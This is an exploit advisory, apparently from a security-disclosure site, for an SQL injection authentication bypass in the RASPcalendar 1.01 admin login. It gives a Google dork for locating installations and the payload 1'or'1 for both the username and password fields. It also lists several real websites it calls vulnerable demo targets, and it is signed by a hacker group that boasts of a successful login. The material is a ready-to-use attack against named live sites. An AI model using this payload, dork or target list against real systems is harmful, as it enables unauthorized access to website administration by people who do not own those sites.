RASPcalendar 1.01 SQL Injection

2013.11.09
Credit: Hackeri-AL
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: allinurl:RASPcalendar \"powered by RASPcalendar\"

--------------------------------------------------- RASPcalendar 1.01 [ASP] Admin Login Vlunerabilities --------------------------------------------------- Author : Hackeri-AL Date : 06-11-2013 Vendor Homepage : http://www.rttucson.com/files.html Software link : http://www.rttucson.com/RASPcalendar.zip Verison : 1.01 Tested On : Windows XP ------------------------------------------------------------ Google Dork: allinurl:RASPcalendar "powered by RASPcalendar" ------------------------------------------------------------ Example : http://www.usfim.it/RASPcalendar/ : http://site.com/events : http://site.com/calendar : etc... Go to : http://www.usfim.it/RASPcalendar/admin/ UserName : 1'or'1 PassWord : 1'or'1 Login Success Fully :D ------------------------------------------------------------ Vuln sites demo : http://www.usfim.it/RASPcalendar/admin http://www.davemitchellassociates.com/events/admin http://www.bradandrebecca.com/Calendar/admin http://www.hlubline.com/pt/calendar/admin ------------------------------------------------------------ Found By Hackeri-AL , UAH-Crew Group 2009-2013 UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~ [~] Legends Of Albania ------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top